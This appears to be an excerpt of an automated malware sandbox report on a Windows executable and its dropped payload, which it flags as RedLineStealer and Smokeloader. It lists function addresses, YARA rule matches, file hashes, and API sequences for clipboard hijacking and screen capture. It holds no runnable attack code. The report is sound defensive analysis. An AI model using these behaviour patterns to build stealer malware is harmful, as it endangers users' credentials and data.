        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,EntryPoint,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,1_2_00436980

        System Summary

        barindex
        Source: 00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
        Source: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02122357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02122357
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021225FB NtdllDefWindowProc_W,PostQuitMessage,0_2_021225FB
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004280120_2_00428012
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004071A10_2_004071A1
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004373C90_2_004373C9
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004274740_2_00427474
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0042D4DE0_2_0042D4DE
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004285500_2_00428550
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0041669F0_2_0041669F
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004137150_2_00413715
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_004277E60_2_004277E6
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0040E96A0_2_0040E96A
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0042EAD00_2_0042EAD0
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00427A900_2_00427A90
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00418A9F0_2_00418A9F
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00436CAF0_2_00436CAF
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00427D570_2_00427D57
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_00413EFB0_2_00413EFB
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021482790_2_02148279
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0214ED370_2_0214ED37
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021341620_2_02134162
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021476DB0_2_021476DB
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0214D7450_2_0214D745
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021487B70_2_021487B7
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02147A4D0_2_02147A4D
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0212EBD10_2_0212EBD1
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_021369060_2_02136906
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0213397C0_2_0213397C
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02156F160_2_02156F16
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02147FBE0_2_02147FBE
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02147CF70_2_02147CF7
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_02138D060_2_02138D06
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0214ED370_2_0214ED37
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043B8701_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004088801_2_00408880
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00421E701_2_00421E70
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004157201_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040CFEC1_2_0040CFEC
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004198401_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004068501_2_00406850
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004278601_2_00427860
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004270701_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043080E1_2_0043080E
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043F8201_2_0043F820
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041D0C01_2_0041D0C0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004418A01_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041194F1_2_0041194F
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043F1501_2_0043F150
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042B1701_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004039001_2_00403900
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004251001_2_00425100
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004399231_2_00439923
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004271331_2_00427133
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004339301_2_00433930
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004121DB1_2_004121DB
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042A9F71_2_0042A9F7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040E9B01_2_0040E9B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041825B1_2_0041825B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042EA621_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040CA621_2_0040CA62
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00442A601_2_00442A60
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041DAD01_2_0041DAD0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00429ADE1_2_00429ADE
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00425AF01_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004092A01_2_004092A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00405AB01_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040B2B01_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004042B01_2_004042B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043CB401_2_0043CB40
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042EB5F1_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004083601_2_00408360
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00428B671_2_00428B67
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00437B691_2_00437B69
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00402B201_2_00402B20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00441B201_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00432B241_2_00432B24
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004063C01_2_004063C0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042DBF01_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004223801_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041BBA01_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042BBA01_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042EBA11_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042EBB31_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00441BB01_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00441C401_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004424701_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00426C761_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041D4001_2_0041D400
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041C4001_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004174051_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00414C201_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004324261_2_00432426
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004284371_2_00428437
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043443D1_2_0043443D
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004354C41_2_004354C4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00434CEF1_2_00434CEF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043A4EF1_2_0043A4EF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004374AB1_2_004374AB
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041DCB01_2_0041DCB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043ACB01_2_0043ACB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0042FCBC1_2_0042FCBC
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040D5451_2_0040D545
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00425D6A1_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00435D131_2_00435D13
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00442D201_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043CD271_2_0043CD27
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00404DC01_2_00404DC0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00420D901_2_00420D90
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043C5A01_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004366101_2_00436610
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004076201_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040AE301_2_0040AE30
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041F6D01_2_0041F6D0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00416ED01_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041BEE11_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00402EF01_2_00402EF0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004186FC1_2_004186FC
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00423EFF1_2_00423EFF
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00431E8E1_2_00431E8E
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041A6901_2_0041A690
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0041AF241_2_0041AF24
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00427F301_2_00427F30
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0040DFE21_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004257E01_2_004257E0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00429FE41_2_00429FE4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004097901_2_00409790
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_004427B01_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_00441FB01_2_00441FB0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FE2491_2_020FE249
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FD2531_2_020FD253
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211A3051_2_0211A305
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210D3271_2_0210D327
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021173B21_2_021173B2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212F3B71_2_0212F3B7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021320171_2_02132017
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FB0971_2_020FB097
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021160B71_2_021160B7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021120D71_2_021120D7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021220F51_2_021220F5
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210C1481_2_0210C148
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F31571_2_020F3157
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021141661_2_02114166
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021181971_2_02118197
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210B18B1_2_0210B18B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F66271_2_020F6627
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210D6671_2_0210D667
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210C6671_2_0210C667
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212268D1_2_0212268D
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021246A41_2_021246A4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021326D71_2_021326D7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021277121_2_02127712
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212572B1_2_0212572B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212A7561_2_0212A756
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FD7AC1_2_020FD7AC
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021024421_2_02102442
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021084C21_2_021084C2
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F95071_2_020F9507
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F45171_2_020F4517
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F85C71_2_020F85C7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021125E71_2_021125E7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02132A171_2_02132A17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02120A751_2_02120A75
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212FA871_2_0212FA87
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02109AA71_2_02109AA7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F6AB71_2_020F6AB7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212BAD71_2_0212BAD7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F8AE71_2_020F8AE7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02107AE41_2_02107AE4
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F3B671_2_020F3B67
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02123B971_2_02123B97
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02129B8A1_2_02129B8A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02101BB61_2_02101BB6
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212C8071_2_0212C807
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_021268771_2_02126877
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F78871_2_020F7887
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210A8F71_2_0210A8F7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210F9371_2_0210F937
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F99F71_2_020F99F7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211EE1A1_2_0211EE1A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211BE071_2_0211BE07
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211EE081_2_0211EE08
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211DE571_2_0211DE57
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02104E871_2_02104E87
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212AF171_2_0212AF17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210DF171_2_0210DF17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211FF231_2_0211FF23
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02124F561_2_02124F56
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02125F7A1_2_02125F7A
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02132F871_2_02132F87
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02110FF71_2_02110FF7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02107FFA1_2_02107FFA
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FEC171_2_020FEC17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020FCCC91_2_020FCCC9
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02132CC71_2_02132CC7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211ECC91_2_0211ECC9
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F5D171_2_020F5D17
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0210DD371_2_0210DD37
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_020F2D871_2_020F2D87
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02122D8B1_2_02122D8B
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0212CDA71_2_0212CDA7
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_02127DD01_2_02127DD0
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0211EDC61_2_0211EDC6
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe 25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\67E6.tmp.exe 25C2A9D961D4110C9E66519B777AA070BEEC2388278ADBD68454D537422BD895
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: String function: 0213000F appears 119 times
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: String function: 00410710 appears 52 times
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: String function: 0040FDA8 appears 123 times
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: String function: 0040F8F9 appears 36 times
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: String function: 02130977 appears 52 times
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: String function: 00414C10 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: String function: 020F83D7 appears 77 times
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: String function: 00408170 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: String function: 02104E77 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 1800
        Source: DLKs2Qeljg.exeBinary or memory string: OriginalFileName vs DLKs2Qeljg.exe
        Source: DLKs2Qeljg.exe, 00000000.00000003.1746153100.0000000003039000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOrehinal4 vs DLKs2Qeljg.exe
        Source: DLKs2Qeljg.exe, 00000000.00000002.4148881842.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DLKs2Qeljg.exe
        Source: DLKs2Qeljg.exe, 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DLKs2Qeljg.exe
        Source: DLKs2Qeljg.exe, 00000000.00000003.1708087776.0000000002190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs DLKs2Qeljg.exe
        Source: DLKs2Qeljg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000001.00000002.1945775576.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.4149087882.0000000000589000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000001.00000002.1946115362.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: 00000000.00000002.4149339317.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
        Source: DLKs2Qeljg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 67E6.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/7@2/3
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeCode function: 0_2_0058A446 CreateToolhelp32Snapshot,Module32First,0_2_0058A446
        Source: C:\Users\user\AppData\Local\Temp\67E6.tmp.exeCode function: 1_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_0043B870
        Source: C:\Users\user\Desktop\DLKs2Qeljg.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
